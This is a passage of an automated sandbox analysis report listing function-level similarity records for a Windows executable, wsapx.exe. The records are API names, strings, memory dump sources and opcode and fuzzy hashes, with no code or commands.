                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(00000000,?,00007FF7C71B352C,?,00000000,00007FF7C71B3F23), ref: 00007FF7C71B7F22
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                • Instruction ID: a680becc744ef84d055fc3f8fae95bd78d6e72bb96fe345c70c495ba6aad656d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 517c45005fecb665460f06d6deeb7a52b86fc8f3bacaeb8cdec2a0b3fdaf0698
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0631B671719AC146EA21AF21B4517AAA364EFC4FF4F841231EE6D477C9DE3CE6068710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                                • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                                • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                                • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction ID: aa86f1ea5dde1402545276de8a72f20fc2fdc1a5200d271e25c32b4b22ae7f82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7121B172B18B4182E721AF54F4857AAA3A4EBC8B94F804131EE8D93655DF3CD24AC750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction ID: 3aab948ca4d1a9e257958ae2f900f2c4ce8a77f9a8670dd7eb98b303ac255d78
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25D12772B18A408BE711DFA9E4401AC7771FB94FA8B848235DE5E57B89DE38D407C750
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD0EC
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C71CCFBB), ref: 00007FF7C71CD177
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction ID: a26d259292c1d742ca6ba35c1b661ed6d895888781958de7865a86e3ed6bf798
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8091D872F2866197F750AFB5A44127DABA0BB84FA8F944139DE4E57A84CE38D443C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction ID: f0f180b177008c89fbe897a43bbf8e0c92963cfc214eed1589d3289e0cb8adaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01512973F081118BFB14EFA4A9957BCA7A9AB90B78F904135ED1D52AE4DF38A503C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction ID: 173772bec6df521791b11e27a7a1971f633386cf7eccb5fbabc1a03cd5548fa8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D516222E086418BFB10EFB1E4503BDABB1AB88FA8F644575DE4D57689DF38D542C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1956198572-0
                                                                                                                                                                                                                                                • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction ID: e79bda630bed4a44c07d468e4c644bff8772ac87388b32baf1dfbe61957b0a38
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB11A971B1C14243F655AF69F9882B99291EBD9FA0FC4C030DF4A07B99CD2DD5968610
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction ID: a06605fad0fb532140a1d7121615bf9b8aa18f496d392976e0b8397aaceec27c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B114F36B14B058BEB00DF60F8452A973A4FB59B68F440E35DA5D46764DF3CD1598350
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: out of memory$too many levels of trigger recursion
                                                                                                                                                                                                                                                • API String ID: 3344901894-3387558265
                                                                                                                                                                                                                                                • Opcode ID: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
                                                                                                                                                                                                                                                • Instruction ID: 5db8916641739661cdd3d782156b67bc14fc1483994f0dbefa5a8c18e584d148
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2da8eabf17ebf59af3b23f36f8cc1f2aacf79c3bff37746ddbcefc3f1bc563b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D816976B05B45C6DB20CF49E494A6977E8FB4A784B468436DF8D83B61DF78E081C780
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: ?
                                                                                                                                                                                                                                                • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                • Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                • Instruction ID: 2a4553ba099a8aec5c5db6e110ca966514bc3a210b5364d9cf161b10ffb011ff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B412B12A1868147F722AF65B481379E664EBE0FF4F944235EE5C06AD5DE3CD442CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C90B6
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8
                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C71BCC15), ref: 00007FF7C71C90D4
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                                • API String ID: 3580290477-3302721598
                                                                                                                                                                                                                                                • Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                • Instruction ID: 17458fd6defc6d2548aebf330592781d0acd47de8e01809fc26c857e4711c2b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB414031A0865287E715FF65B8810BDA794EB84FE4BD54035EA4E43B85DE3CE4938360
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: 00007C0619
                                                                                                                                                                                                                                                • String ID: cannot use RETURNING in a trigger$sqlite_returning
                                                                                                                                                                                                                                                • API String ID: 3344901894-753984552
                                                                                                                                                                                                                                                • Opcode ID: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
                                                                                                                                                                                                                                                • Instruction ID: 3015117afa24c8f2734104e29be6e27039b4d1da0ca5b669c04129db08871bd3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66416F32B09B89D6E6789B61E5A03B973A4FB4AB84F448431DB9D07796CF3CE461C341
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction ID: a2e211a56e73fee2a883212f16d36f7c676aa409a19189427c2e43a6ffa515af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F41A772B18A4586DB209F65F4443B9A761FBD4BA4F844035EE4D87B98DF3CD502CB50
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory
                                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                                • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                • Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                • Instruction ID: 5fb5493a09cc253c9a3302ad274e7611088f32cc27f6fc463b717bc04ae42c2e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1421CE63A0829183EB20AF55E04426DB3B5FBC8F94FD58035DA8D43694DF7CEA46CB61
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
